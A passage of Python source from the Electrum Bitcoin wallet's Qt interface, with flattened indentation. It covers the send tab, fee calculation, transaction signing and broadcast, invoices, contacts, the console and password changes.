addr = str(self.receive_address_e.text())
if self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = FromList(self, self.from_list_menu)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(self.amount_e.width())
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
fee_rate = Decimal(fee_rate)
self.feerate_e.setAmount(quantize_feerate(fee_rate / 1000))
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.max_button.isChecked() else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(self.amount_e.width())
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if edit_changed.get_amount() is None:
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(self.amount_e.width())
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.') + '\n' +
_('Also, when batching RBF transactions, BIP 125 imposes a lower bound on the fee.'))
self.show_message(title=_('Fee rounding'), msg=text)
self.feerounding_icon = QPushButton(read_QIcon('info.png'), '')
self.feerounding_icon.setFixedWidth(round(2.2 * char_width_in_lineedit()))
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _("Not enough funds")
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += " ({} {} {})".format(
self.format_amount(c + u + x).strip(), self.base_unit(), _("are frozen")
)
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
self.max_button.setChecked(True)
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.max_button.isChecked() else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [TxOutput(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
coins, outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
self.logger.exception('')
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
if displayed_feerate is not None:
displayed_feerate = quantize_feerate(displayed_feerate)
else:
# fallback to actual fee
displayed_feerate = quantize_feerate(fee / size) if fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
displayed_fee = round(displayed_feerate * size) if displayed_feerate is not None else None
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = quantize_feerate(displayed_fee / size) if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(int(feerounding))
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(abs(feerounding) >= 1)
if self.max_button.isChecked():
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount() # sat/byte feerate
amount = 0 if amount is None else amount * 1000 # sat/kilobyte feerate
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
def read_send_tab(self):
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def check_send_tab_outputs_and_show_errors(self, outputs) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.address is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.type == TYPE_ADDRESS and not bitcoin.is_address(o.address):
self.show_error(_('Invalid Bitcoin Address'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
outputs, fee_estimator, tx_desc, coins = self.read_send_tab()
if self.check_send_tab_outputs_and_show_errors(outputs):
return
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
self.show_message(str(e))
return
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
except BaseException as e:
self.logger.exception('')
self.show_message(str(e))
return
amount = tx.output_value() if self.max_button.isChecked() else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error('\n'.join([
_("This transaction requires a higher fee, or it will not be propagated by your current server"),
_("Try to raise your transaction fee, or use a server with a lower relay fee.")
]))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(str(tx), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def set_frozen_state_of_coins(self, utxos, freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_addresses', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove {} from your wallet?").format(addr)):
self.wallet.delete_address(addr)
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
if pr is None:
self.show_error('Cannot find payment request in wallet.')
return
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
